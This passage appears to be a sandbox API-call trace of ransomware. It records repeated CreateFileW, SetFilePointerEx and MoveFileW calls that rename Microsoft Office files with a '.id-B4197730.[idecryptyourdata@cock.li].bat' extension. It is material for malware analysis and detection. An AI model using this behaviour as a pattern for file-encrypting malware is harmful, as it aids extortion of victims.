lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.489] CloseHandle (hObject=0x52c) returned 1 [0165.490] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.490] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.490] CloseHandle (hObject=0x52c) returned 1 [0165.491] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.491] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.491] CloseHandle (hObject=0x52c) returned 1 [0165.492] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.492] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.493] CloseHandle (hObject=0x52c) returned 1 [0165.494] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.494] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.494] CloseHandle (hObject=0x52c) returned 1 [0165.495] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.495] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.497] CloseHandle (hObject=0x52c) returned 1 [0165.498] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.498] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.498] CloseHandle (hObject=0x52c) returned 1 [0165.499] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.499] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.500] CloseHandle (hObject=0x52c) returned 1 [0165.500] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.501] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.501] CloseHandle (hObject=0x52c) returned 1 [0165.502] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.502] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.502] CloseHandle (hObject=0x52c) returned 1 [0165.503] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.503] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.504] CloseHandle (hObject=0x52c) returned 1 [0165.505] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.505] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.506] CloseHandle (hObject=0x52c) returned 1 [0165.507] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.507] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.507] CloseHandle (hObject=0x52c) returned 1 [0165.508] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.508] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.508] CloseHandle (hObject=0x52c) returned 1 [0165.509] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.510] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeServiceBypassR_PrepidBypass-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeservicebypassr_prepidbypass-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.510] CloseHandle (hObject=0x52c) returned 1 [0165.511] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.511] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.511] CloseHandle (hObject=0x52c) returned 1 [0165.512] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.512] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.513] CloseHandle (hObject=0x52c) returned 1 [0166.821] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.821] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.821] CloseHandle (hObject=0x51c) returned 1 [0167.577] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.577] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_PostCommon.Office.x-none.mcxml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.office.x-none.mcxml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.577] CloseHandle (hObject=0x52c) returned 1 [0167.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLLIBR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outllibr.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLLIBR.DLL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outllibr.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.685] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.686] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HOL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hol.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.686] CloseHandle (hObject=0x42c) returned 1 [0167.687] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.687] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.687] CloseHandle (hObject=0x42c) returned 1 [0167.688] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.688] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.688] CloseHandle (hObject=0x42c) returned 1 [0167.689] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.689] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.689] CloseHandle (hObject=0x42c) returned 1 [0167.690] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.690] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.690] CloseHandle (hObject=0x42c) returned 1 [0167.691] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.691] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.691] CloseHandle (hObject=0x42c) returned 1 [0167.692] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.692] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PE.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pe.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.693] CloseHandle (hObject=0x42c) returned 1 [0167.694] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.694] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PIPELINE.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pipeline.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.694] CloseHandle (hObject=0x42c) returned 1 [0167.695] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PJINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pjintl.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PJINTL.DLL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pjintl.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.697] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.697] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.697] CloseHandle (hObject=0x42c) returned 1 [0167.699] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.699] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.699] CloseHandle (hObject=0x42c) returned 1 [0167.700] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.700] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.700] CloseHandle (hObject=0x42c) returned 1 [0167.700] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.700] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" 